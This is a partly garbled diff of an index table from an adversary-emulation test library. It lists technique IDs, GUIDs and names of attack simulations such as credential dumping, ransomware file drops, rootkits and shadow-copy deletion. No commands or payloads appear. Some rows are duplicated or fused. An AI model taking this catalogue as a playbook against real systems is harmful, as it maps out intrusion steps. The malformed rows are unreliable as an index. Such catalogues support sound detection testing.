discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
@@ -2232,7 +2187,6 @@ impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33
impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
impact,T1496,Resource Hijacking,1,FreeBSD/macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,sh
impact,T1496,Resource Hijacking,2,Windows - Simulate CPU Load with PowerShell,44315fb0-f78d-4cef-b10f-cf21c1fe2c75,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
@@ -2250,7 +2204,6 @@ impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,6
impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-b7ff-30966bfb1aff,sh
impact,T1490,Inhibit System Recovery,13,Windows - Delete Volume Shadow Copies via Diskshadow,42111a6f-7e7f-482c-9b1b-3cfd090b999c,powershell
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
@@ -2273,8 +2226,6 @@ initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Ena
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
initial-access,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
38 defense-evasion T1564.008 Hide Artifacts: Email Hiding Rules 1 New-Inbox Rule to Hide E-mail in M365 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9 powershell
39 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 1 Decode Eicar File and Write to File 7693ccaa-8d64-4043-92a5-a2eb70359535 powershell
40 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 2 Decrypt Eicar File and Write to File b404caaa-12ce-43c7-9214-62a531c044f7 powershell
defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 3 Password-Protected ZIP Payload Extraction and Execution c2ca068a-eb1e-498f-9f93-3d554c455916 bash
41 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
42 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
43 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
555 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
556 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
557 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
defense-evasion T1027 Obfuscated Files or Information 11 Obfuscated PowerShell Command via Character Array 6683baf0-6e77-4f58-b114-814184ea8150 powershell
558 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
559 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
560 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
603 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
604 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 Office 365 - Set Audit Bypass For a Mailbox c9a2f6fe-7197-488c-af6d-10c782121ca6 powershell
605 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 10 GCP - Delete Activity Event Log d56152ec-01d9-42a2-877c-aac1f6ebe8e6 sh
defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 11 AWS - Config Logs Disabled 4608bc1b-e682-466b-a7d7-dbd76760db31 sh
606 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
607 defense-evasion T1564.003 Hide Artifacts: Hidden Window 2 Headless Browser Accessing Mockbin 0ad9ab92-c48c-4f08-9b20-9633277c4646 command_prompt
608 defense-evasion T1564.003 Hide Artifacts: Hidden Window 3 Hidden Window-Conhost Execution 5510d22f-2595-4911-8456-4d630c978616 powershell
defense-evasion T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
609 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
610 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - FreeBSD/Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
611 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - FreeBSD/Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
927 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
928 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
929 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 1 Python Startup Hook - atomic_hook.pth (Windows) 57289962-21dc-4501-b756-80cd30608d9f powershell
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 2 Python Startup Hook - usercustomize.py (Windows) 05cc7a2c-ce32-46f2-a358-f27f76718c39 powershell
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 3 Python Startup Hook - atomic_hook.pth (Linux) a58c066d-f2f0-42a2-ab70-30af73f89e66 sh
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 4 Python Startup Hook - atomic_hook.pth (macOS) 28ca4f81-fa96-47ff-8555-dde98017e89b sh
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 5 Python Startup Hook - usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8 sh
930 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
931 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
932 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
1024 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
1025 execution T1106 Native API 5 Run Shellcode via Syscall in Go ae56083f-28d0-417d-84da-df4242da1f7c powershell
1026 execution T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT 1 AutoHotKey script execution 7b5d350e-f758-43cc-a761-8e3f6b052a03 powershell
execution T1569.003 System Services: Systemctl 1 Create and Enable a Malicious systemd Service Unit e58c8723-5503-4533-b642-535cd20ec648 sh
execution T1569.003 System Services: Systemctl 2 Create systemd Service Unit from /tmp (Unusual Location) a1fa406e-2354-4a24-b6d6-94157e7564d4 sh
execution T1569.003 System Services: Systemctl 3 Create systemd Service Unit from /dev/shm (Unusual Location) dce49381-a26b-4d95-bdfa-c607ffe8bee5 sh
execution T1569.003 System Services: Systemctl 4 Modify Existing systemd Service to Execute Malicious Command 6123928f-6389-4914-8d25-a5d69bd657fa sh
execution T1569.003 System Services: Systemctl 5 Execute Command via Transient systemd Service (systemd-run) a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236 sh
execution T1569.003 System Services: Systemctl 6 Enumerate All systemd Services Using systemctl 1e5be8d4-605a-4acb-8709-2f80b2d8ea95 sh
execution T1569.003 System Services: Systemctl 7 Enable systemd Service for Persistence with Auto-Restart 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7 sh
execution T1569.003 System Services: Systemctl 8 Masquerade Malicious Service as Legitimate System Service 6fec8560-ff64-4bbf-bc79-734fea48f7ca sh
1027 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
1028 execution T1059 Command and Scripting Interpreter 1 AutoIt Script Execution a9b93f17-31cb-435d-a462-5e838a2a6026 powershell
1029 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
1165 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
1166 persistence T1505.005 Server Software Component: Terminal Services DLL 2 Modify Terminal Services DLL Path 18136e38-0530-49b2-b309-eed173787471 powershell
1167 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
1168 persistence T1176 Browser Extensions 2 Firefox Chrome/Chromium (Chrome Web Store) cb790029-17e6-4c43-b96f-002ce5f10938 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
1169 persistence T1176 Browser Extensions 3 Edge Chromium Addon - VPN Firefox 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 cb790029-17e6-4c43-b96f-002ce5f10938 manual
1170 persistence T1176 Browser Extensions 4 Google Chrome Load Unpacked Extension With Command Line Edge Chromium Addon - VPN 7a714703-9f6b-461c-b06d-e6aeac650f27 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 powershell manual
1171 persistence T1137.005 T1176 Office Application Startup: Outlook Rules Browser Extensions 1 5 Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object Google Chrome Load Unpacked Extension With Command Line ffadc988-b682-4a68-bd7e-4803666be637 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 2 Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object bddfd8d4-7687-4971-b611-50a537ab3ab4 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 3 Outlook Rule - Auto-Forward Emails to External Address via COM Object b0bd3d76-a57c-4699-83f4-8cd798dd09bd powershell
persistence T1137.005 Office Application Startup: Outlook Rules 4 Outlook Rules - Enumerate Existing Rules via PowerShell COM Object 5ff5249a-5807-480e-ab52-c430497a8a25 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 5 Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) cb814cf8-24f2-41dc-a1cd-1c2073276d4a powershell
1172 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
1173 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
1174 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
1404 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
1405 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
1406 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 1 Python Startup Hook - atomic_hook.pth (Windows) 57289962-21dc-4501-b756-80cd30608d9f powershell
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 2 Python Startup Hook - usercustomize.py (Windows) 05cc7a2c-ce32-46f2-a358-f27f76718c39 powershell
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 3 Python Startup Hook - atomic_hook.pth (Linux) a58c066d-f2f0-42a2-ab70-30af73f89e66 sh
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 4 Python Startup Hook - atomic_hook.pth (macOS) 28ca4f81-fa96-47ff-8555-dde98017e89b sh
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 5 Python Startup Hook - usercustomize.py (Linux / MacOS) 6e78084a-a433-4702-a838-cc7b765d87e8 sh
1407 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
1408 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
1409 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
1413 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
1414 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
1415 persistence T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
persistence T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1416 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
1417 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
1418 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
1452 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
1453 command-and-control T1132.001 Data Encoding: Standard Encoding 2 Base64 Encoded data (freebsd) 2d97c626-7652-449e-a986-b02d9051c298 sh
1454 command-and-control T1132.001 Data Encoding: Standard Encoding 3 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
command-and-control T1568.002 Dynamic Resolution: Domain Generation Algorithms 1 DGA Simulation (Python) cc367493-3a00-4c4a-a685-16b73339167c bash
1455 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
1456 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
1457 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
1472 command-and-control T1219 Remote Access Software 13 Splashtop Execution b025c580-029e-4023-888d-a42710d76934 powershell
1473 command-and-control T1219 Remote Access Software 14 Splashtop Streamer Execution 3e1858ee-3550-401c-86ec-5e70ed79295b powershell
1474 command-and-control T1219 Remote Access Software 15 Microsoft App Quick Assist Execution 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75 powershell
command-and-control T1659 Content Injection 1 MITM Proxy Injection 9b360eaf-c778-4f07-a6e7-895c4f01ac1c bash
command-and-control T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
1475 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1476 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1477 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1559 collection T1113 Screen Capture 7 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
1560 collection T1113 Screen Capture 8 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
1561 collection T1113 Screen Capture 9 Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted 5a496325-0115-4274-8eb9-755b649ad0fb powershell
collection T1113 Screen Capture 10 RDP Bitmap Cache Extraction via bmc-tools 98f19852-7348-4f99-9e15-6ff4320464c7 powershell
1562 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1563 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
1564 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
1819 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1820 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1821 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
credential-access T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1822 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1823 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1824 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1828 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1829 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1830 credential-access T1003.003 OS Credential Dumping: NTDS 9 Create Volume Shadow Copy with diskshadow b385996c-0e7d-4e27-95a4-aca046b119a7 command_prompt
credential-access T1003.003 OS Credential Dumping: NTDS 10 Copy NTDS in low level NTFS acquisition via MFT parsing f57cb283-c131-4e2f-8a6c-363d575748b2 powershell
credential-access T1003.003 OS Credential Dumping: NTDS 11 Copy NTDS in low level NTFS acquisition via fsutil c7be89f7-5d06-4321-9f90-8676a77e0502 powershell
1831 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1832 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1833 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1861 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
1862 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
1863 discovery T1652 Device Driver Discovery 1 Device Driver Discovery 235b30a2-e5b1-441f-9705-be6231c88ddd powershell
discovery T1652 Device Driver Discovery 2 Device Driver Discovery (Linux) d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1 bash
discovery T1652 Device Driver Discovery 3 Enumerate Kernel Driver Files (Linux) 13c0fef5-9be9-4d7f-9c6b-901624e53770 bash
discovery T1652 Device Driver Discovery 4 List loaded kernel extensions (macOS) 71eab73d-5d7d-4681-9a72-7873489a5b85 bash
discovery T1652 Device Driver Discovery 5 Find Kernel Extensions (macOS) c63bbe52-6f17-4832-b221-f07ba8b1736f bash
1864 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
1865 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
1866 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
1923 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1924 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl/service f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
1925 discovery T1007 System Service Discovery 4 Get-Service Execution 51f17016-d8fa-4360-888a-df4bf92c4a04 command_prompt
discovery T1007 System Service Discovery 5 System Service Discovery - macOS launchctl 9b378962-a75e-4856-b117-2503d6dcebba sh
discovery T1007 System Service Discovery 6 System Service Discovery - Windows Scheduled Tasks (schtasks) 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a command_prompt
discovery T1007 System Service Discovery 7 System Service Discovery - Services Registry Enumeration d70d82bd-bb00-4837-b146-b40d025551b2 powershell
discovery T1007 System Service Discovery 8 System Service Discovery - Linux init scripts 8f2a5d2b-4018-46d4-8f3f-0fea53754690 sh
1926 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1927 discovery T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
1928 discovery T1040 Network Sniffing 3 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
2039 discovery T1083 File and Directory Discovery 9 Recursive Enumerate Files And Directories By Powershell 95a21323-770d-434c-80cd-6f6fbf7af432 powershell
2040 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
2041 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
2042 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery via PowerShell (Process Mapping) System Network Connections Discovery FreeBSD, Linux & MacOS b52c8233-8f71-4bd7-9928-49fec8215cf5 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 powershell sh
2043 discovery T1049 System Network Connections Discovery 4 System Network Connections Discovery via ss or lsof (Linux/MacOS) System Discovery using SharpView bcf05343-ef1d-4052-8a27-b00c9be42b9f 96f974bb-a0da-4d87-a744-ff33e73367e9 bash powershell
discovery T1049 System Network Connections Discovery 5 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
discovery T1049 System Network Connections Discovery 6 System Network Connections Discovery via sockstat (Linux, FreeBSD) 997bb0a6-421e-40c7-b5d2-0f493904ef9b sh
discovery T1049 System Network Connections Discovery 7 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
2044 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
2045 discovery T1619 Cloud Storage Object Discovery 2 Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI 070322a4-2c60-4c50-8ffb-c450a34fe7bf powershell
2046 discovery T1619 Cloud Storage Object Discovery 3 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
2187 impact T1486 Data Encrypted for Impact 9 Data Encrypt Using DiskCryptor 44b68e11-9da2-4d45-a0d9-893dabd60f30 command_prompt
2188 impact T1486 Data Encrypted for Impact 10 Akira Ransomware drop Files with .akira Extension and Ransomnote ab3f793f-2dcc-4da5-9c71-34988307263f powershell
2189 impact T1496 Resource Hijacking 1 FreeBSD/macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 sh
impact T1496 Resource Hijacking 2 Windows - Simulate CPU Load with PowerShell 44315fb0-f78d-4cef-b10f-cf21c1fe2c75 powershell
2190 impact T1485 Data Destruction 1 Windows - Overwrite file with SysInternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
2191 impact T1485 Data Destruction 2 FreeBSD/macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 sh
2192 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
2204 impact T1490 Inhibit System Recovery 10 Windows - vssadmin Resize Shadowstorage Volume da558b07-69ae-41b9-b9d4-4d98154a7049 powershell
2205 impact T1490 Inhibit System Recovery 11 Modify VSS Service Permissions a4420f93-5386-4290-b780-f4f66abc7070 command_prompt
2206 impact T1490 Inhibit System Recovery 12 Disable Time Machine ed952f70-91d4-445a-b7ff-30966bfb1aff sh
impact T1490 Inhibit System Recovery 13 Windows - Delete Volume Shadow Copies via Diskshadow 42111a6f-7e7f-482c-9b1b-3cfd090b999c powershell
2207 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
2208 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
2209 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - FreeBSD/macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb sh
